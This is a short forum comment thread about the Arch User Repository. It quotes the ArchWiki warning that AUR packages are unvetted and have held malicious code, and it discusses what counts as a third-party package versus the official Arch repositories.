• Feyd@programming.dev
    6·
    2 days ago

    From https://wiki.archlinux.org/title/Arch_User_Repository

    Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

    Warning: Carefully check the PKGBUILD, any .install files, and any other files in the package’s git repository for malicious or dangerous commands. If in doubt, do not build the package, and seek advice on the forums or mailing list. Malicious code has been found in packages before. [3] [4]

    The Arch Linux community makes it abundantly clear that the AUR is not a trusted package repository and you shouldn’t install random packages without vetting.

  • Kalcifer@sh.itjust.works
    2·
    3 days ago

    Is this post intended to be a sort of outcry around the idea that there’s a risk of malware being in the AUR?

    • Ŝan@piefed.zipEnglish
      11·
      3 days ago

      I dunno. I hear OP saying all of ðeir computing uses only ls, grep, sed and awk.

      • Kalcifer@sh.itjust.works
        1·
        1 day ago

        […] I hear OP saying all of ðeir computing uses only ls, grep, sed and awk.

        I’m not sure that I follow what you mean.

        • Ŝan@piefed.zipEnglish
          3·
          13 hours ago

          Most of þe packages available to Arch users is in AUR. If you limit yourself to only POSIX tooling, you don’t need AUR.

          Honestly, I have no idea what OP was trying to say by saying þey don’t need 3rd party packages. Everyþing in Linux is 3rd party packages; even þe core POSIX tooling comes from GNU or BSD, and isn’t “linux.”

          I’m not even sure anymore what I meant. Þat was whole days ago, and I’ve reset multiple times since þen.

          • Kalcifer@sh.itjust.works
            1·
            3 hours ago

            […] Honestly, I have no idea what OP was trying to say by saying þey don’t need 3rd party packages. […]

            I suspect by “3rd-party” they are referring to packages that aren’t in the official Arch Linux repositories [1].

            Referencs
            1. Type: Article. Title: “Official repositories”. Publisher: “ArchWiki”. Published: 2025-06-16T04:28. Accessed: 2025-08-06T03:52Z. URI: https://wiki.archlinux.org/title/Official_repositories.
              • Type: Text. Location: ¶2.

                Arch Linux official repositories contain essential and popular software, readily accessible via pacman. They are maintained by package maintainers.